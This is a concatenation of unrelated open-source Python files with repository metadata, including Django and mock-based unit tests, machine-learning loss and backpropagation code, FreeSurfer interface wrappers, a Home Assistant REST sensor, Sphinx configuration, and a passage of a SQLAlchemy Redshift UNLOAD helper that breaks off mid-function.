"""Checks that a refund is enqueued and contains the correct values."""
self.contribution.enqueue_refund(status, self.user,
refund_reason=refund_reason,
rejection_reason=rejection_reason)
expected.update(contribution=self.contribution, status=status)
eq_(Refund.objects.count(), 1)
refund = Refund.objects.filter(**expected)
eq_(refund.exists(), True)
return refund[0]
def test_pending(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
def test_pending_to_approved(self):
reason = 'this is bloody bullocks, mate'
expected = dict(refund_reason=reason,
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, reason)
self.assertCloseToNow(refund.requested)
# Change `requested` date to some date in the past.
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=reason,
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.approved)
def test_approved_instant(self):
expected = dict(refund_reason='',
requested__isnull=False,
approved__isnull=False,
declined=None)
refund = self.do_refund(expected, amo.REFUND_APPROVED_INSTANT)
self.assertCloseToNow(refund.requested)
self.assertCloseToNow(refund.approved)
def test_pending_to_declined(self):
refund_reason = 'please, bro'
rejection_reason = 'sorry, brah'
expected = dict(refund_reason=refund_reason,
rejection_reason='',
requested__isnull=False,
approved=None,
declined=None)
refund = self.do_refund(expected, amo.REFUND_PENDING, refund_reason)
self.assertCloseToNow(refund.requested)
requested_date = refund.requested - datetime.timedelta(hours=1)
refund.requested = requested_date
refund.save()
expected = dict(refund_reason=refund_reason,
rejection_reason=rejection_reason,
requested__isnull=False,
approved=None,
declined__isnull=False)
refund = self.do_refund(expected, amo.REFUND_DECLINED,
rejection_reason=rejection_reason)
eq_(refund.requested, requested_date,
'Expected date `requested` to remain unchanged.')
self.assertCloseToNow(refund.declined)
class TestRefundManager(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
self.addon = Addon.objects.get(id=3615)
self.user = UserProfile.objects.get(email='del@icio.us')
self.expected = {}
for status in amo.REFUND_STATUSES.keys():
c = Contribution.objects.create(addon=self.addon, user=self.user,
type=amo.CONTRIB_PURCHASE)
self.expected[status] = Refund.objects.create(contribution=c,
status=status,
user=self.user)
def test_all(self):
eq_(sorted(Refund.objects.values_list('id', flat=True)),
sorted(e.id for e in self.expected.values()))
def test_pending(self):
eq_(list(Refund.objects.pending(self.addon)),
[self.expected[amo.REFUND_PENDING]])
def test_approved(self):
eq_(list(Refund.objects.approved(self.addon)),
[self.expected[amo.REFUND_APPROVED]])
def test_instant(self):
eq_(list(Refund.objects.instant(self.addon)),
[self.expected[amo.REFUND_APPROVED_INSTANT]])
def test_declined(self):
eq_(list(Refund.objects.declined(self.addon)),
[self.expected[amo.REFUND_DECLINED]])
def test_by_addon(self):
other = Addon.objects.create(type=amo.ADDON_WEBAPP)
c = Contribution.objects.create(addon=other, user=self.user,
type=amo.CONTRIB_PURCHASE)
ref = Refund.objects.create(contribution=c, status=amo.REFUND_DECLINED,
user=self.user)
declined = Refund.objects.filter(status=amo.REFUND_DECLINED)
eq_(sorted(r.id for r in declined),
sorted(r.id for r in [self.expected[amo.REFUND_DECLINED], ref]))
eq_(sorted(r.id for r in Refund.objects.by_addon(addon=self.addon)),
sorted(r.id for r in self.expected.values()))
eq_(list(Refund.objects.by_addon(addon=other)), [ref])
|
jinankjain/zamboni
|
apps/market/tests/test_models.py
|
Python
|
bsd-3-clause
| 16,762
|
from neon.transforms.cost import Cost
class MulticlsSVMLoss(Cost):
def __init__(self, delta=1.):
self.delta = delta
def __call__(self, y, t):
T = self.be.empty_like(y)
T[:] = self.be.max(y * t, axis=0)
# T = self.be.array(self.be.max(y * t, axis=0).asnumpyarray(), y.shape[0], axis=0)
margin = self.be.square(self.be.maximum(0, y - T + self.delta)) * 0.5
return self.be.sum(margin) / self.be.bsz
def bprop(self, y, t):
T = self.be.empty_like(y)
T[:] = self.be.max(y * t, axis=0)
return self.be.maximum(0, y - T + self.delta) / self.be.bsz
class L1SVMLoss(Cost):
def __init__(self, C=10):
self.C = C
def __call__(self, y, t):
return self.C * self.be.sum(self.be.square(self.be.maximum(0, 1 - y * (t * 2 - 1)))) * 0.5 / y.shape[0]
def bprop(self, y, t):
return - self.C * (t * 2 - 1) * self.be.maximum(0, 1 - y * (t * 2 - 1)) / self.be.bsz / y.shape[0]
|
cs-chan/fuzzyDCN
|
prune_neon/transformation/cost.py
|
Python
|
bsd-3-clause
| 979
|
from unittest import mock
from taskplus.core.actions import GetRoleDetailsAction, GetRoleDetailsRequest
from taskplus.core.domain import UserRole
from taskplus.core.shared.response import ResponseFailure
def test_get_role_details_action():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role.id)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is True
roles_repo.one.assert_called_once_with(role.id)
assert response.value == role
def test_get_role_details_action_with_hooks():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role.id)
action = GetRoleDetailsAction(roles_repo)
before = mock.MagicMock()
after = mock.MagicMock()
action.add_before_execution_hook(before)
action.add_after_execution_hook(after)
response = action.execute(request)
assert before.called
assert after.called
assert bool(response) is True
roles_repo.one.assert_called_once_with(role.id)
assert response.value == role
def test_get_role_details_action_handles_bad_request():
role = mock.Mock()
role = UserRole(name='admin', id=1)
roles_repo = mock.Mock()
roles_repo.one.return_value = role
request = GetRoleDetailsRequest(role_id=None)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is False
assert not roles_repo.one.called
assert response.value == {
'type': ResponseFailure.PARAMETER_ERROR,
'message': 'role_id: is required'
}
def test_get_role_details_action_handles_generic_error():
error_message = 'Error!!!'
roles_repo = mock.Mock()
roles_repo.one.side_effect = Exception(error_message)
request = GetRoleDetailsRequest(role_id=1)
action = GetRoleDetailsAction(roles_repo)
response = action.execute(request)
assert bool(response) is False
roles_repo.one.assert_called_once_with(1)
assert response.value == {
'type': ResponseFailure.SYSTEM_ERROR,
'message': 'Exception: {}'.format(error_message)
}
|
Himon-SYNCRAFT/taskplus
|
tests/core/actions/get_role_details/test_get_role_details_action.py
|
Python
|
bsd-3-clause
| 2,317
|
import math
import net
SIGMOID = 0
TANH = 1
class bp:
def __init__(self, net, learning_rate, momentum):
self.type = net.getType()
self.net = net
self.lr = learning_rate
self.m = momentum
self.layer = net.getLayer()
self.lc = [[[0]*max(self.layer)]*max(self.layer)]*len(self.layer)
def _dfunc(self, y):
if self.type==SIGMOID:
return y * (1.0 - y)
else:
return 1.0 - y**2
def setLearningRate(self,x):
self.lr = x
def setMomentum(self, x):
self.m = x
def backPropagate(self, input, target):
if len(target)!=self.layer[-1]:
print len(target)
print self.layer[-1]
raise ValueError('Wrong number of target values')
self.net.process(input)
nlayer = len(self.layer)
delta = []
for i in range(0, nlayer):
delta.append([0.0] * self.layer[i])
for i in range(0,self.layer[nlayer-1]):
node = self.net.getNode(nlayer-1, i)
error = target[i] - node
delta[nlayer-1][i] = self._dfunc(node) * error
for l in range(nlayer-2, 0, -1):
for i in range(0, self.layer[l]):
error = 0.0
for j in range(0, self.layer[l+1]):
error = error + delta[l+1][j] * self.net.getWeight(l+1, i, j)
delta[l][i] = self._dfunc(self.net.getNode(l,i)) * error
for l in range(nlayer-2, -1, -1):
for i in range(0, self.layer[l]):
for j in range(0, self.layer[l+1]):
change = delta[l+1][j] * self.net.getNode(l, i)
w = self.net.getWeight(l+1, i, j) + self.lr * change + self.m * self.lc[l+1][i][j]
self.net.setWeight(l+1, i, j, w)
self.lc[l+1][i][j] = change
for i in range(0, self.layer[l+1]):
b = self.net.getBias(l+1, i) + delta[l+1][i]
self.net.setBias(l+1, i, b)
error = 0.0
for i in range(0, len(target)):
error = error + 0.5 * (target[i] - self.net.getNode(nlayer-1, i))**2
return error
|
bongtrop/cilab-python
|
ann/bp.py
|
Python
|
bsd-3-clause
| 1,933
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The freesurfer module provides basic functions for interfacing with
freesurfer tools.
Currently these tools are supported:
* Dicom2Nifti: using mri_convert
* Resample: using mri_convert
Examples
--------
See the docstrings for the individual classes for 'working' examples.
"""
__docformat__ = 'restructuredtext'
from builtins import object
import os
from ..base import (CommandLine, Directory,
CommandLineInputSpec, isdefined,
traits, TraitedSpec, File)
from ...utils.filemanip import fname_presuffix
class Info(object):
""" Freesurfer subject directory and version information.
Examples
--------
>>> from nipype.interfaces.freesurfer import Info
>>> Info.version() # doctest: +SKIP
>>> Info.subjectsdir() # doctest: +SKIP
"""
@staticmethod
def version():
"""Check for freesurfer version on system
Find which freesurfer is being used....and get version from
/path/to/freesurfer/build-stamp.txt
Returns
-------
version : string
version number as string
or None if freesurfer version not found
"""
fs_home = os.getenv('FREESURFER_HOME')
if fs_home is None:
return None
versionfile = os.path.join(fs_home, 'build-stamp.txt')
if not os.path.exists(versionfile):
return None
fid = open(versionfile, 'rt')
version = fid.readline()
fid.close()
return version
@classmethod
def subjectsdir(cls):
"""Check the global SUBJECTS_DIR
Parameters
----------
subjects_dir : string
The system defined subjects directory
Returns
-------
subject_dir : string
Represents the current environment setting of SUBJECTS_DIR
"""
if cls.version():
return os.environ['SUBJECTS_DIR']
return None
class FSTraitedSpec(CommandLineInputSpec):
subjects_dir = Directory(exists=True, desc='subjects directory')
class FSCommand(CommandLine):
"""General support for FreeSurfer commands.
Every FS command accepts 'subjects_dir' input.
"""
input_spec = FSTraitedSpec
_subjects_dir = None
def __init__(self, **inputs):
super(FSCommand, self).__init__(**inputs)
self.inputs.on_trait_change(self._subjects_dir_update, 'subjects_dir')
if not self._subjects_dir:
self._subjects_dir = Info.subjectsdir()
if not isdefined(self.inputs.subjects_dir) and self._subjects_dir:
self.inputs.subjects_dir = self._subjects_dir
self._subjects_dir_update()
def _subjects_dir_update(self):
if self.inputs.subjects_dir:
self.inputs.environ.update({'SUBJECTS_DIR':
self.inputs.subjects_dir})
@classmethod
def set_default_subjects_dir(cls, subjects_dir):
cls._subjects_dir = subjects_dir
@property
def version(self):
return Info.version()
def run(self, **inputs):
if 'subjects_dir' in inputs:
self.inputs.subjects_dir = inputs['subjects_dir']
self._subjects_dir_update()
return super(FSCommand, self).run(**inputs)
def _gen_fname(self, basename, fname=None, cwd=None, suffix='_fs',
use_ext=True):
'''Define a generic mapping for a single outfile
The filename is potentially autogenerated by suffixing inputs.infile
Parameters
----------
basename : string (required)
filename to base the new filename on
fname : string
if not None, just use this fname
cwd : string
prefix paths with cwd, otherwise os.getcwd()
suffix : string
default suffix
'''
if basename == '':
msg = 'Unable to generate filename for command %s. ' % self.cmd
msg += 'basename is not set!'
raise ValueError(msg)
if cwd is None:
cwd = os.getcwd()
fname = fname_presuffix(basename, suffix=suffix,
use_ext=use_ext, newpath=cwd)
return fname
@property
def version(self):
ver = Info.version()
if ver:
if 'dev' in ver:
return ver.rstrip().split('-')[-1] + '.dev'
else:
return ver.rstrip().split('-v')[-1]
class FSScriptCommand(FSCommand):
""" Support for Freesurfer script commands with log inputs.terminal_output """
_terminal_output = 'file'
_always_run = False
def __init__(self, **inputs):
super(FSScriptCommand, self).__init__(**inputs)
self.set_default_terminal_output(self._terminal_output)
def _list_outputs(self):
outputs = self._outputs().get()
outputs['log_file'] = os.path.abspath('stdout.nipype')
return outputs
class FSScriptOutputSpec(TraitedSpec):
log_file = File('stdout.nipype', usedefault=True,
exists=True, desc="The output log")
class FSTraitedSpecOpenMP(FSTraitedSpec):
num_threads = traits.Int(desc='allows for specifying more threads')
class FSCommandOpenMP(FSCommand):
"""Support for FS commands that utilize OpenMP
Sets the environment variable 'OMP_NUM_THREADS' to the number
of threads specified by the input num_threads.
"""
input_spec = FSTraitedSpecOpenMP
_num_threads = None
def __init__(self, **inputs):
super(FSCommandOpenMP, self).__init__(**inputs)
self.inputs.on_trait_change(self._num_threads_update, 'num_threads')
if not self._num_threads:
self._num_threads = os.environ.get('OMP_NUM_THREADS', None)
if not isdefined(self.inputs.num_threads) and self._num_threads:
self.inputs.num_threads = int(self._num_threads)
self._num_threads_update()
def _num_threads_update(self):
if self.inputs.num_threads:
self.inputs.environ.update(
{'OMP_NUM_THREADS': str(self.inputs.num_threads)})
def run(self, **inputs):
if 'num_threads' in inputs:
self.inputs.num_threads = inputs['num_threads']
self._num_threads_update()
return super(FSCommandOpenMP, self).run(**inputs)
|
dgellis90/nipype
|
nipype/interfaces/freesurfer/base.py
|
Python
|
bsd-3-clause
| 6,473
|
'''@file standard_trainer.py
contains the StandardTrainer'''
from nabu.neuralnetworks.trainers import trainer
class StandardTrainer(trainer.Trainer):
'''a trainer with no added functionality'''
def aditional_loss(self):
'''
add an aditional loss
returns:
the aditional loss or None
'''
return None
def chief_only_hooks(self, outputs):
'''add hooks only for the chief worker
Args:
outputs: the outputs generated by the create graph method
Returns:
a list of hooks
'''
return []
def hooks(self, outputs):
'''add hooks for the session
Args:
outputs: the outputs generated by the create graph method
Returns:
a list of hooks
'''
return []
|
vrenkens/nabu
|
nabu/neuralnetworks/trainers/standard_trainer.py
|
Python
|
mit
| 844
|
SECRET_KEY = 'fake-key'
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
}
INSTALLED_APPS = [
"django_nose",
"tests",
]
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
'--with-coverage',
'--cover-package=search_views',
]
|
bianchimro/django-search-views
|
tests/settings.py
|
Python
|
mit
| 289
|
import _plotly_utils.basevalidators
class TickfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="tickfont", parent_name="layout.ternary.aaxis", **kwargs
):
super(TickfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
|
plotly/python-api
|
packages/python/plotly/plotly/validators/layout/ternary/aaxis/_tickfont.py
|
Python
|
mit
| 1,549
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('caudexer', '0002_auto_20151107_1409'),
]
operations = [
migrations.AlterField(
model_name='goodreadsdata',
name='good_reads_id',
field=models.CharField(max_length=100),
),
migrations.AlterField(
model_name='googlebooksdata',
name='google_book_id',
field=models.CharField(max_length=100),
),
]
|
hacktm15/caudexer
|
dexer/caudexer/migrations/0003_auto_20151107_1415.py
|
Python
|
mit
| 589
|
#!/usr/bin/env python
from ZSI import Binding
MESSAGE = "Hello from Python!"
def main():
binding = Binding(url='http://localhost:8080/server.py')
print ' Sending: %s' % MESSAGE
response = binding.echo(MESSAGE)
print 'Response: %s' % MESSAGE
if __name__ == '__main__':
main()
|
acigna/pywez
|
zsi/doc/examples/client/send_request/simple/Binding/client.py
|
Python
|
mit
| 301
|
import deepchem as dc
import numpy as np
import sklearn
from sklearn.ensemble import RandomForestClassifier
N = 100
n_feat = 5
n_classes = 3
X = np.random.rand(N, n_feat)
y = np.random.randint(3, size=(N,))
dataset = dc.data.NumpyDataset(X, y)
sklearn_model = RandomForestClassifier(class_weight="balanced", n_estimators=50)
model = dc.models.SklearnModel(sklearn_model)
# Fit trained model
print("About to fit model")
model.fit(dataset)
model.save()
print("About to evaluate model")
train_scores = model.evaluate(dataset, sklearn.metrics.roc_auc_score, [])
print("Train scores")
print(train_scores)
|
lilleswing/deepchem
|
examples/multiclass/multiclass_sklearn.py
|
Python
|
mit
| 605
|
"""
Support for RESTful binary sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/binary_sensor.rest/
"""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from homeassistant.components.sensor.rest import RestData
from homeassistant.const import CONF_VALUE_TEMPLATE
from homeassistant.helpers import template
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'REST Binary Sensor'
DEFAULT_METHOD = 'GET'
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup REST binary sensors."""
resource = config.get('resource', None)
method = config.get('method', DEFAULT_METHOD)
payload = config.get('payload', None)
verify_ssl = config.get('verify_ssl', True)
rest = RestData(method, resource, payload, verify_ssl)
rest.update()
if rest.data is None:
_LOGGER.error('Unable to fetch Rest data')
return False
add_devices([RestBinarySensor(
hass, rest, config.get('name', DEFAULT_NAME),
config.get(CONF_VALUE_TEMPLATE))])
# pylint: disable=too-many-arguments
class RestBinarySensor(BinarySensorDevice):
"""A REST binary sensor."""
def __init__(self, hass, rest, name, value_template):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._state = False
self._value_template = value_template
self.update()
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
if self._value_template is not None:
self.rest.data = template.render_with_possible_json_value(
self._hass, self._value_template, self.rest.data, False)
return bool(int(self.rest.data))
def update(self):
"""Get the latest data from REST API and updates the state."""
self.rest.update()
|
aoakeson/home-assistant
|
homeassistant/components/binary_sensor/rest.py
|
Python
|
mit
| 2,159
|
#!/usr/bin/env python
import sys
args = ' '.join(sys.argv[1:])
print(f"""Deprecated as of commit 959939b771. Use flask utility script instead:
$ flask {args}
""")
raise SystemExit(1)
|
betterlife/flask-psi
|
manage.py
|
Python
|
mit
| 184
|
# -*- coding: utf-8 -*-
#
# dolphintools documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 22:39:14 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'dolphintools'
copyright = u'2015, Alper Kucukural'
author = u'Alper Kucukural'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'dolphintoolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'dolphintools.tex', u'dolphintools Documentation',
u'Alper Kucukural', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dolphintools', u'dolphintools Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'dolphintools', u'dolphintools Documentation',
author, 'dolphintools', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
nephantes/dolphin-tools
|
docs/conf.py
|
Python
|
mit
| 9,231
|
import collections
import numbers
import re
import sqlalchemy as sa
from sqlalchemy.ext import compiler as sa_compiler
from sqlalchemy.sql import expression as sa_expression
# At the time of this implementation, no specification for a session token was
# found. After looking at a few session tokens they appear to be the same as
# the aws_secret_access_key pattern, but much longer. An example token can be
# found here:
# https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html
# The regexs for access keys can be found here:
# https://blogs.aws.amazon.com/security/blog/tag/key+rotation
# The pattern of IAM role ARNs can be found here:
# http://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html#arn-syntax-iam
ACCESS_KEY_ID_RE = re.compile('[A-Z0-9]{20}')
SECRET_ACCESS_KEY_RE = re.compile('[A-Za-z0-9/+=]{40}')
TOKEN_RE = re.compile('[A-Za-z0-9/+=]+')
AWS_ACCOUNT_ID_RE = re.compile('[0-9]{12}')
IAM_ROLE_NAME_RE = re.compile('[A-Za-z0-9+=,.@-_]{1,64}')
def _process_aws_credentials(access_key_id=None, secret_access_key=None,
session_token=None, aws_account_id=None,
iam_role_name=None):
if (access_key_id is not None and secret_access_key is not None and
aws_account_id is not None and iam_role_name is not None):
raise TypeError(
'Either access key based credentials or role based credentials '
'should be specified, but not both'
)
credentials = None
if aws_account_id is not None and iam_role_name is not None:
if not AWS_ACCOUNT_ID_RE.match(aws_account_id):
raise ValueError(
'invalid AWS account ID; does not match {pattern}'.format(
pattern=AWS_ACCOUNT_ID_RE.pattern,
)
)
elif not IAM_ROLE_NAME_RE.match(iam_role_name):
raise ValueError(
'invalid IAM role name; does not match {pattern}'.format(
pattern=IAM_ROLE_NAME_RE.pattern,
)
)
credentials = 'aws_iam_role=arn:aws:iam::{0}:role/{1}'.format(
aws_account_id,
iam_role_name,
)
if access_key_id is not None and secret_access_key is not None:
if not ACCESS_KEY_ID_RE.match(access_key_id):
raise ValueError(
'invalid access_key_id; does not match {pattern}'.format(
pattern=ACCESS_KEY_ID_RE.pattern,
)
)
if not SECRET_ACCESS_KEY_RE.match(secret_access_key):
raise ValueError(
'invalid secret_access_key; does not match {pattern}'.format(
pattern=SECRET_ACCESS_KEY_RE.pattern,
)
)
credentials = 'aws_access_key_id={0};aws_secret_access_key={1}'.format(
access_key_id,
secret_access_key,
)
if session_token is not None:
if not TOKEN_RE.match(session_token):
raise ValueError(
'invalid session_token; does not match {pattern}'.format(
pattern=TOKEN_RE.pattern,
)
)
credentials += ';token={0}'.format(session_token)
if credentials is None:
raise TypeError(
'Either access key based credentials or role based credentials '
'should be specified'
)
return credentials
def _process_fixed_width(spec):
return ','.join(('{0}:{1:d}'.format(col, width) for col, width in spec))
class _ExecutableClause(sa_expression.Executable,
sa_expression.ClauseElement):
pass
class UnloadFromSelect(_ExecutableClause):
"""
Prepares a Redshift unload statement to drop a query to Amazon S3
https://docs.aws.amazon.com/redshift/latest/dg/r_UNLOAD_command_examples.html
Parameters
----------
select: sqlalchemy.sql.selectable.Selectable
The selectable Core Table Expression query to unload from.
data_location: str
The Amazon S3 location where the file will be created, or a manifest
file if the `manifest` option is used
access_key_id: str, optional
Access Key. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
secret_access_key: str, optional
Secret Access Key ID. Required unless you supply role-based credentials
(``aws_account_id`` and ``iam_role_name``)
session_token : str, optional
aws_account_id: str, optional
AWS account ID for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
iam_role_name: str, optional
IAM role name for role-based credentials. Required unless you supply
key based credentials (``access_key_id`` and ``secret_access_key``)
manifest: bool, optional
Boolean value denoting whether data_location is a manifest file.
delimiter: File delimiter, optional
defaults to '|'
fixed_width: iterable of (str, int), optional
List of (column name, length) pairs to control fixed-width output.
encrypted: bool, optional
Write to encrypted S3 key.
gzip: bool, optional
Create file using GZIP compression.
add_quotes: bool, optional
Quote fields so that fields containing the delimiter can be
distinguished.
null: str, optional
Write null values as the given string. Defaults to ''.
escape: bool, optional
For CHAR and VARCHAR columns in delimited unload files, an escape
character (``\\``) is placed before every occurrence of the following
characters: ``\\r``, ``\\n``, ``\\``, the specified delimiter string.
If `add_quotes` is specified, ``"`` and ``'`` are also escaped.
allow_overwrite: bool, optional
Overwrite the key at unload_location in the S3 bucket.
parallel: bool, optional
If disabled unload sequentially as one file.
"""
def __init__(self, select, unload_location, access_key_id=None,
secret_access_key=None, session_token=None,
aws_account_id=None, iam_role_name=None,
manifest=False, delimiter=None, fixed_width=None,
encrypted=False, gzip=False, add_quotes=False, null=None,
escape=False, allow_overwrite=False, parallel=True):
if delimiter is not None and len(delimiter) != 1:
raise ValueError(
'"delimiter" parameter must be a single character'
)
credentials = _process_aws_credentials(
access_key_id=access_key_id,
secret_access_key=secret_access_key,
session_token=session_token,
